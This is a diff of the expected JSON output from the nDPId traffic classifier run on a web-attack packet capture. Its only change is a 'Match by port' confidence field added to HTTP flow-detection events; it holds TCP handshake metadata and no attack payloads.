+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347314358,"flow_last_seen":1499347314358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1499347314358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347314358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wpZAAD4GAzqsEAABwKgKMtpCAFAntfjvAAAAAKACchAoGQAAAgQFtAQCCAoBOjp5AAAAAAEDAwc="}
@@ -1096,17 +1096,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1499347323234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347323234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CttAAD4GuvWsEAABwKgKMtqgAFDxkUn\/AAAAAKACchAEJAAAAgQFtAQCCAoBOkMkAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1499347323234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347323234,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2qDnEfYn8ZFKAKAScSAPSwAAAgQFtAQCCAoD5BSaATpDJAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":3,"flow_last_seen":1499347323235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347323235,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CtxAAD4GuvysEAABwKgKMtqgAFDxkUoA5xH2KIAQAOWuUgAAAQEICgE6QyQD5BSa"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324279,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347324538,"flow_last_seen":1499347324538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347324538,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1499347324538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347324538,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uCpAAD4GDaasEAABwKgKMtquAFARp\/xAAAAAAKACchAweQAAAgQFtAQCCAoBOkRqAAAAAAEDAwc="}
@@ -1132,17 +1132,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1499347333419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347333419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bENAAD4GWY2sEAABwKgKMtsMAFCNWiFVAAAAAKACchCGpwAAAgQFtAQCCAoBOk0WAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":2,"flow_last_seen":1499347333420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347333420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2wzHhupcjVohVqAScSCzMgAAAgQFtAQCCAoD5B6MATpNFgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":3,"flow_last_seen":1499347333420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347333420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bERAAD4GWZSsEAABwKgKMtsMAFCNWiFWx4bqXYAQAOVSOgAAAQEICgE6TRYD5B6M"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
